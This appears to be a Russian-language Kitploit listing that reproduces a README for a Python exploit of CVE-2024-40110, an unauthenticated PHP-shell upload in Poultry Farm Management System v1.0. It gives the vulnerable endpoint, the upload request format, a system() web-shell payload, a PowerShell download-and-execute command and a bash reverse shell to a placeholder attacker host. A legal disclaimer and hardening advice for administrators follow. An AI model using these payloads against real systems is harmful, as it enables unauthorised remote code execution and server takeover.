Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-40110 — Python-эксплойт для неаутентифицированного удаленного выполнения кода через загрузку файлов в Poultry Farm Management System v1.0. Загружает PHP-шеллы для выполнения произвольных системных команд на уязвимых целях. | Kitploit
Инструменты/GitHubGitHub/angry-althaf/cve-2024-40110
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubangry-althaf/cve-2024-40110

CVE-2024-40110

Python-эксплойт для неаутентифицированного удаленного выполнения кода через загрузку файлов в Poultry Farm Management System v1.0. Загружает PHP-шеллы для выполнения произвольных системных команд на уязвимых целях.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
7 месяцев назадЕщё не проверено

Система управления птицефермой v1.0 - RCE-эксплойт

Тип уязвимости

Неаутентифицированная загрузка файлов с удалённым выполнением кода

Описание

Система управления птицефермой v1.0 содержит критическую уязвимость в функционале загрузки товаров. Приложение не выполняет надлежащую проверку и санитизацию загружаемых файлов, что позволяет злоумышленникам загружать PHP-файлы, замаскированные под изображения товаров. Эти загруженные PHP-файлы могут быть выполнены для достижения удалённого выполнения кода.

Уязвимая конечная точка

root@kitploit:~
POST /paultry/farm/product.php или POST /farm/product.php

Вектор атаки

Уязвимость может быть использована следующим образом:

  1. Отправка POST-запроса к конечной точке загрузки товаров
  2. Загрузка PHP-шелла с произвольными командами
  3. Доступ к загруженному файлу для выполнения встроенных команд

Требования

Предварительные условия

  • Python 3.7+
  • Библиотека requests
  • Библиотека colorama (для цветного вывода)
  • Сетевой доступ к уязвимой цели

Установка

root@kitploit:~
pip install requests colorama

Или установите все зависимости:

root@kitploit:~
pip install -r requirements.txt

Использование

Базовое использование

Запустите скрипт в интерактивном режиме:

root@kitploit:~
python exploit.py

Скрипт запросит:

  1. IP-адрес цели — IP-адрес уязвимого сервера
  2. Порт цели — номер порта (по умолчанию: 80)
  3. Команда для выполнения — системная команда для выполнения на цели

Пример

root@kitploit:~
==================================================
Интерактивный инструмент загрузки бэкдора
==================================================

Введите IP-адрес цели: 192.168.1.100
Введите порт цели (по умолчанию: 80): 8080
Введите команду для выполнения (по умолчанию: powershell payload):
Команда: whoami

==================================================
ПОДТВЕРЖДЕНИЕ
==================================================
Целевой URL: http://192.168.1.100:8080
Команда: whoami
Вы хотите продолжить? (да/нет): да

Возможности

✅ Интерактивный ввод — запрос IP, порта и пользовательских команд
✅ Значения по умолчанию — разумные значения по умолчанию для удобства
✅ Цветной вывод — легко читаемый цветной вывод в терминале
✅ Шаг подтверждения — проверка настроек перед выполнением
✅ Обработка ошибок — понятные сообщения об ошибках при неудачных запросах
✅ Гибкие команды — поддержка любых команд оболочки или полезных нагрузок PowerShell

Типовые команды

Цели под Windows

root@kitploit:~
powershell -Command "Invoke-WebRequest http://attacker-ip:8787/shell.exe -OutFile shell.exe; Start-Process shell.exe"

Цели под Linux

root@kitploit:~
bash -i >& /dev/tcp/attacker-ip/4444 0>&1

Сбор информации

root@kitploit:~
whoami
id
ifconfig
hostname
pwd

Технические детали

Как это работает

  1. Загрузка файла: Отправляет POST-запрос с PHP-полезной нагрузкой в виде файла
  2. Выполнение полезной нагрузки: Загруженный PHP-файл сохраняется в /assets/img/productimages/
  3. Выполнение команды: Обращение к PHP-файлу запускает выполнение команды через функцию system()
  4. Получение вывода: Скрипт извлекает вывод через GET-запрос

Структура запроса

root@kitploit:~
POST /paultry/farm/product.php
Content-Type: multipart/form-data

category=CHICKEN
product=rce
price=100
save=
productimage=[PHP_PAYLOAD]

Формат полезной нагрузки

root@kitploit:~
<?php system('COMMAND_HERE');?>

Среда тестирования

Эксплойт протестирован на:

  • ОС: Windows 10
  • Сервер: XAMPP v3.3.0
  • Версия PHP: совместим с PHP 5.6+

Отказ от ответственности

⚠️ ПРАВОВОЕ ПРЕДУПРЕЖДЕНИЕ

Данный инструмент предоставляется только для авторизованного тестирования безопасности и образовательных целей. Несанкционированный доступ к компьютерным системам незаконен.

  • Используйте этот эксплойт только на системах, которые вам принадлежат или на которые у вас есть явное письменное разрешение на тестирование.
  • Авторы не несут ответственности за неправомерное использование или ущерб, причинённый данным инструментом.
  • Пользователи обязаны соблюдать все применимые законы и нормативные акты.
  • Несанкционированный доступ, модификация или нарушение работы компьютерных систем являются федеральным преступлением в соответствии с Законом о компьютерном мошенничестве и злоупотреблениях (CFAA) и аналогичными законами по всему миру.

Меры защиты

Для администраторов

  1. Обновление ПО — установите доступные исправления безопасности

  2. Проверка загружаемых файлов

    • Проверяйте расширения файлов (белый список: jpg, png, gif и т.д.)
    • Проверяйте MIME-типы на стороне сервера
    • Храните загруженные файлы вне корня веб-сервера
    • Отключайте выполнение скриптов в директориях загрузки
  3. Настройка

    root@kitploit:~
    <Directory /uploads>
        php_flag engine off
        AddType text/plain .php .phtml .php3 .php4 .php5 .phar
    </Directory>
    
  4. Контроль доступа

    • Внедрите аутентификацию перед разрешением загрузки
    • Проверяйте права пользователей
    • Добавьте ограничение частоты запросов
  5. Мониторинг

    • Отслеживайте директории загрузок на наличие подозрительных файлов
    • Логируйте все попытки загрузки
    • Внедрите проверку целостности файлов

Ссылки

  • Exploit DB: https://www.exploit-db.com/exploits/52053
  • GitHub: https://github.com/w3bn00b3r/Unauthenticated-Remote-Code-Execution-RCE---Poultry-Farm-Management-System-v1.0/
  • Оригинальное ПО: https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html

Устранение неполадок

Соединение отклонено

root@kitploit:~
Ошибка: Соединение отклонено
Решение: Проверьте правильность IP-адреса и порта цели, а также то, что приложение работает

404 Не найдено

root@kitploit:~
Ошибка: Не удалось загрузить шелл. Код состояния: 404
Решение: Путь к конечной точке может отличаться. Распространённые пути: /farm/, /paultry/farm/

PHP не выполняется

root@kitploit:~
Ошибка: Вывод команды пуст
Решение: Возможно, выполнение PHP отключено, или файл был загружен некорректно

Поддержка

По вопросам, проблемам или предложениям обращайтесь к репозиторию на GitHub или странице Exploit-DB.


Последнее обновление: Декабрь 2024
Статус: Проверено и протестировано

Скачать инструмент